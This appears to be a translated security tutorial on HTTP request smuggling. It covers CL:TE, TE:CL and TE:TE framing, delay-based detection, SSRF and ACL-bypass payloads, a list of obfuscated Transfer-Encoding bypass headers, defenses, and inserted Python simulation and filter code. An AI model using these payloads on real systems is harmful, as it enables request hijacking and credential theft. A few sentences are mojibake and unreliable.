
HTTP Request Smuggling

🔍 Introduction

HTTP Request Smuggling is a class of problem that arises in environments made up of several network hops, where the servers and devices in each segment process an HTTP request differently. The usual trigger is sending Content-Length and Transfer-Encoding together, so that each hop is led to judge the length of the HTTP request differently.

When the lengths disagree, each server perceives a different request length, so part of the request is cut off, and that leftover stays on the socket and is prepended to the next request that is processed. This is what is called HTTP Request Smuggling. If the architecture does load balancing (an LB, for example), the socket may be attached to another user's request, in which case that other user's web request can be arbitrarily tampered with; this is called a Desync Attack.

Content-Length

Content-Length is the length header used by default in the vast majority of web requests. The length of the HTTP body is carried alongside the request in the Content-Length header.

POST / HTTP/1.1
Host: www.hahwul.com
Content-Length: 4

asdf

If the actual Content-Length differs from the length of the body, the request is either truncated (when the CL header is smaller) or the server waits and eventually times out (when the CL header is larger).

Transfer-Encoding: chunked

chunked is an HTTP transfer mechanism designed for streaming and large file transfers. Unlike an ordinary HTTP request, which handles the start and end of the data in one go per connection, a chunked request lets a single body be made up of several sends over the connection. The format is as follows.

HTTP body

๊ธธ์ด\r\n
๊ฐ’\r\n
๊ธธ์ด\r\n
๊ฐ’\r\n

As shown above, the body is written as pairs of lines: a length line followed by a value line. Even if the request arrives in several sends, it is treated as one body, and the transfer is considered complete only when the terminating 0\r\n arrives. If 0\r\n never arrives, the server keeps waiting for the rest of the request. A concrete example looks like this.

POST / HTTP/1.1
Host: www.hahwul.com
Transfer-Encoding: chunked

3
ABC
0

In the request above, 3 is the length of the ABC that follows, the second line ABC is the value, and the final 0 marks the end of the request. When an HTTP request is sent in pieces, the pieces look like this.

Request 1

POST / HTTP/1.1
Host: www.hahwul.com
Transfer-Encoding: chunked

3
ABC

Request 2

POST / HTTP/1.1
Host: www.hahwul.com
Transfer-Encoding: chunked

2
AB
0

Attack Point & Testing Flow

Having read this far, you know how the Content-Length (CL) and Transfer-Encoding (TE) headers behave. The point is that, when both headers are sent at once, several network hops can be made to handle them differently, which forces the request to be split.

๊ฐœ์ธ์ ์œผ๋กœ ์ƒ๊ฐํ•  ๋•Œ 4๊ฐœ ์ •๋„์˜ ํ”Œ๋กœ์šฐ๋กœ ์ง„ํ–‰ํ•˜๋ฉด, ์ทจ์•ฝ ํฌ์ธํŠธ ๋ฐœ๊ฒฌ๋ถ€ํ„ฐ ์‹ค์ œ ์˜ํ–ฅ๋ ฅ ๊ฒ€์ฆ๊นŒ์ง€ ํ…Œ์ŠคํŠธํ•˜๊ธฐ ์‰ฝ์Šต๋‹ˆ๋‹ค.

Step 1. Find the smuggling point (Burp Suite scanning / smuggler.py / manual testing).
Step 2. Induce a delay. Use the relationship between CL and TE so that the request takes longer than the original or produces a Gateway Timeout or similar.
Step 3. If a delay can be induced, smuggling is possible, so adjust the sizes to actually split the request and test it:
  • typically use two pages that return different status codes, e.g. Req1 = 200 OK, Req2 = 301, 400, 404, 500, etc.;
  • if, after the smuggling request (Req1), a request for the same page (Req1) receives the smuggled response (Req2), the target is vulnerable.
Step 4. Test the risks that smuggling can lead to (the exploitation stage).

CL:TE

CL:TE is the case where, when the CL and TE headers are sent together, the front server in the chain trusts CL and the backend server trusts TE. If the request below is sent, CL is 13, so the front server forwards the entire request to the backend; the backend looks at TE and, because 0\r\n has arrived, considers the request finished. The string SMUGGLED is then left unprocessed on the socket.

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

When the next web request arrives, the two are combined as shown below.

SMUGGLEDPOST /page HTTP/1.1
Host: vulnerable-website.com

In this way we can alter the entire next request. This can be used to change the Host header, change the requested page, and so on. Attacks are covered in a little more detail in the Offensive techniques section below.

TE:CL

TE:CL is the opposite of CL:TE: when the headers are sent together, the front server trusts TE and the backend trusts CL. When the request below is sent, the front server trusts TE and forwards the full request (the data up to 0\r\n) to the backend; the backend looks at the CL header, so it consumes only 3 bytes (8\r\n) and leaves the rest. Everything from SMUGGLED onward is therefore left unprocessed on the socket and is combined with the next request. (The mechanism is the same as CL:TE.)

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0
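As an added example that is not part of the original page, the following Python models the two framings described in the CL:TE and TE:CL sections: it reads one raw request the way a Content-Length-trusting hop and a chunked-trusting hop each would, and returns what each leaves unread on the socket. The two sample requests are constructed copies of the page's CL:TE and TE:CL requests; all function names are this example's own.

```python
# Added example, not code from the original page: frame one raw HTTP/1.1
# request the way a Content-Length-trusting hop and a chunked-trusting hop each
# would, and return what every hop leaves unread on the socket. The two sample
# requests are constructed copies of the page's CL:TE and TE:CL requests.

def split_headers(raw: bytes):
    """Return (headers as {lower-cased name: value}, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def frame_by_content_length(raw: bytes):
    """CL hop: take exactly Content-Length body bytes; the rest stays unread."""
    headers, body = split_headers(raw)
    n = int(headers[b"content-length"])
    return body[:n], body[n:]

def frame_by_chunked(raw: bytes):
    """TE hop: decode chunks up to the 0-size chunk; the rest stays unread.
    Raises ValueError when the body never reaches a valid 0 chunk, which is
    exactly the case in which a TE-trusting hop keeps waiting (the delay the
    Detect section relies on)."""
    _, body = split_headers(raw)
    pos, data = 0, b""
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            pos = body.index(b"\r\n", pos) + 2         # empty trailer section
            return data, body[pos:]
        data += body[pos:pos + size]
        pos += size + 2                                # chunk data + CRLF

def unread_bytes(raw: bytes):
    """Bytes that one hop counts as this request and the other hop does not."""
    rest_cl = frame_by_content_length(raw)[1]
    rest_te = frame_by_chunked(raw)[1]
    return rest_cl or rest_te

# Constructed samples, identical to the page's CL:TE and TE:CL requests.
CL_TE = (b"POST / HTTP/1.1\r\nHost: vulnerable-website.com\r\n"
         b"Content-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n"
         b"0\r\n\r\nSMUGGLED")
TE_CL = (b"POST / HTTP/1.1\r\nHost: vulnerable-website.com\r\n"
         b"Content-Length: 3\r\nTransfer-Encoding: chunked\r\n\r\n"
         b"8\r\nSMUGGLED\r\n0\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("CL:TE", CL_TE), ("TE:CL", TE_CL)):
        print(label, "left on the socket:", unread_bytes(req))
```

Whatever `unread_bytes` returns is the prefix the next request on that connection will be glued to, which is the desync the page describes.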

TE:TE

TE:TE is the case where Transfer-Encoding is sent in an abnormal form (for example with a leading tab or space) and the servers differ in how they handle it, so each one processes TE differently. With many hops this is usually not called TE:TE, but in the simple case it is referred to as TE:TE.

For example, a case like this.

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
  Transfer-Encoding: chunked
Transfer-Encoding: identity


8
SMUGGLED
0


Server A trusts the whitespace-prefixed Transfer-Encoding: chunked, reads up to 0\r\n and forwards the request to the backend. If the backend treats Transfer-Encoding: identity as the valid TE header, the first TE and the second TE are handled differently, which causes the request to be split.

🗡 Offensive techniques

Because web requests can be altered, there are several exploitation methods. How they are used depends on the situation, but here are the most common ones.

Detect

ํƒ์ง€ ๋ฐฉ๋ฒ•์€ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค. ์‚ฌ์ด์ฆˆ๊ฐ€ ๋‹ค๋ฅธ Content-Length, Transfer-Encoding์„ ๋™์‹œ์— ๋ณด๋‚ด์„œ Delay๋ฅผ ์œ ๋„ํ•˜๋Š” ๋ฐฉ๋ฒ•์œผ๋กœ ์‰ฝ๊ฒŒ ์ฒดํฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Taking TE:CL as the example:

  1. The request below has CL 11 and a TE body ending at 0\r\n, so nothing is cut off; it is a normal request.
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 11
Transfer-Encoding: chunked

1
A
0


  2. The request below still has a valid CL of 11, but the TE body does not end with 0\r\n, so a backend that trusts Transfer-Encoding keeps the connection alive and waits for 0\r\n. This produces a delay, which is a strong indication that the server is vulnerable.
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 11
Transfer-Encoding: chunked

1
A
T


Exploiting - SSRF

The most basic method is manipulating the Host header and similar to induce access to internal resources. Because the cut-off request originates from inside the infrastructure, smuggling may give access to internal systems.

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 50
Transfer-Encoding: chunked

0
GET / HTTP/1.1
Host: internal-service-host-name

Exploiting - Bypass ACL

Sometimes an IP-based ACL is in place; smuggling can be used to bypass it.

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 37
Transfer-Encoding: chunked

0
GET /api/v2/internal-apis HTTP/1.1

Exploiting - Desync

Desync attacks, which affect other users, have almost unlimited uses.

  • Redirect to a malicious domain (Host header tampering)
  • Forcing 404s (DoS)
  • Header-based XSS (header-based XSS is normally hard to trigger, but becomes easy with a desync attack)
  • Leaking sensitive data (because the trailing part of the headers is cut off and appended to the next request, tampering with the Host header can leak authentication cookies, headers and similar to a malicious domain)

Bypass technique - Normalization Attack

Use an IDN character (%f9). IDN characters are handled differently by each server/application, which can be used to bypass checks.

Transfer-Encoding: chùnked

Bypass technique - \x00

Transfer-Encoding: \x00chunked

Bypass technique - Bypass WAF

Foo: bar\r\n\rTransfer-Encoding: chunked

And many more patterns

%c: 0x1, 0x4, 0x8, 0x9, 0xa, 0xb, 0xc, 0xd, 0x1F, 0x20, 0x7f, 0xA0, 0xFF, 0x7F, 0x100, etc.


 Transfer-Encoding: chunked
%cTransfer-Encoding%c: chunked
%cTransfer-Encoding: chunked
%cTransfer-Encoding: chunked%c
%cTransfer-Encoding:%cchunked
Content-Encoding: chunked
TRANSFER-ENCODING: CHUNKED
TrAnSFer-EnCODinG: cHuNkeD
Transf\x82r-Encoding: chunked
Transfer Encoding: chunked
Transfer Encoding:chunked
Transfer-Encoding : chunked
Transfer-Encoding%c: chunked
Transfer-Encoding%c: chunked%c
Transfer-Encoding%c:%cchunked
Transfer-Encoding:  chunked
Transfer-Encoding: 'chunked'
Transfer-Encoding: \
Transfer-Encoding: ch\x96nked
Transfer-Encoding: chunk
Transfer-Encoding: chunked%c
Transfer-Encoding: chunked%cX: X
Transfer-Encoding: chunked%c\nX: X
Transfer-Encoding: chunked, cow
Transfer-Encoding: chunked\r
Transfer-Encoding: chunked\r%cX: X
Transfer-Encoding: chunked\t
Transfer-Encoding: cow chunked bar
Transfer-Encoding: cow, chunked
Transfer-Encoding: cow\r\nTransfer-Encoding: chunked
Transfer-Encoding:%cchunked
Transfer-Encoding:%cchunked%c
Transfer-Encoding:\n chunked
Transfer-Encoding:\tchunked
Transfer-Encoding:\u000Bchunked
Transfer-Encoding:\xFFchunked
Transfer-Encoding\t:\tchunked
Transfer\r-Encoding: chunked
Transfer_Encoding: chunked
X: X%cTransfer-Encoding: chunked
X: X%c\nTransfer-Encoding: chunked
X: X\r%cTransfer-Encoding: chunked
X:X\nTransfer-Encoding: chunked
X:X\rTransfer-Encoding: chunked

🛡 Defensive techniques

Vendor and library patches

This is the simplest countermeasure. Vendors of the affected devices and servers often provide individual patches, which can be applied to remove the vulnerability. As far as I know, these patches typically strip the chunked header forms used for bypasses, or block CL and TE headers from being delivered together.

Such cases may have a CVE, so identify exactly where the vulnerability occurs; if it is a problem in a device or server, it can be resolved by patching.

Blocking abnormal requests

A web request carrying both CL and TE is really not normal. If the server/application refuses to process requests in which both arrive at once, the vulnerability can be blocked. However, bypass patterns may slip past such a check, so careful verification is needed.

Disabling Transfer-Encoding

The second method is ignoring the TE header. The TE header is not something ordinary services must use, so if the service does not need TE, the front end can be changed so that the TE header is not forwarded to the backend. However, bypass patterns may still get TE through to the backend, so careful verification is needed.
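As an added example (not the page's or any vendor's code), the following Python implements the kind of front-end check the two sections above call for, rejecting abnormal requests rather than trying to normalize them: it flags a header block when CL and TE appear together, when TE is spelled in any of the obfuscated forms from the pattern list above (odd casing, whitespace around the name, control bytes, bare CR/LF, non-"chunked" values) or when either header is duplicated. The strict policy, the function names and the sample header blocks are all this example's own.

```python
# Added example, not code from the original page: a strict front-end check for
# the two defensive sections above. It returns the reasons a header block should
# be rejected instead of forwarded, so nothing ambiguous reaches the backend.
import re

# RFC 7230 "token" characters: a header name made of anything else is suspect
TOKEN = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")

def header_block_problems(raw_headers: bytes) -> list:
    """Return reasons to reject this header block (empty list = looks clean).

    raw_headers is everything after the request line, CRLF-separated.
    Policy (deliberately strict, this example's own choice): the only TE form
    accepted is exactly 'Transfer-Encoding: chunked', TE and CL never appear
    together, and neither header appears twice.
    """
    problems = []
    te_seen = cl_seen = 0
    for line in raw_headers.split(b"\r\n"):
        if not line:
            continue
        if b"\r" in line or b"\n" in line:
            # bare CR/LF hides a second header from lenient parsers
            problems.append("bare CR/LF inside header line: %r" % line)
        name, sep, value = line.partition(b":")
        if not sep:
            problems.append("header line without a colon: %r" % line)
            continue
        if not TOKEN.match(name):
            # catches leading SP/HT, control bytes, non-ASCII and 'Name :' spacing
            problems.append("malformed header name: %r" % name)
        squashed = re.sub(rb"[^a-z]", b"", name.lower())   # lookalikes collapse
        if squashed == b"transferencoding":
            te_seen += 1
            if name != b"Transfer-Encoding" or value not in (b" chunked", b"chunked"):
                problems.append("non-canonical Transfer-Encoding: %r" % line)
        elif squashed == b"contentlength":
            cl_seen += 1
            if not re.fullmatch(rb" ?[0-9]+", value):
                problems.append("bad Content-Length value: %r" % value)
    if te_seen and cl_seen:
        problems.append("Content-Length and Transfer-Encoding both present")
    if te_seen > 1 or cl_seen > 1:
        problems.append("duplicated length-defining header")
    return problems

# Constructed samples: a clean chunked request, the page's TE:TE header block,
# and the WAF-bypass line from above that hides TE behind a bare CR.
CLEAN = b"Host: example.test\r\nTransfer-Encoding: chunked\r\n"
TE_TE = (b"Host: example.test\r\nContent-Length: 3\r\n"
         b"  Transfer-Encoding: chunked\r\nTransfer-Encoding: identity\r\n")
BARE_CR = b"Foo: bar\r\n\rTransfer-Encoding: chunked\r\n"
```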

Using HTTP/2

Communication over HTTP/2 is not vulnerable to the attacks above. Note, however, that it can still be affected by HTTP/2 H2C smuggling.

🕹 Tools

📌 References

Licensed under CC BY-NC-SA 4.0
Last updated on Aug 28, 2021 00:46 +0900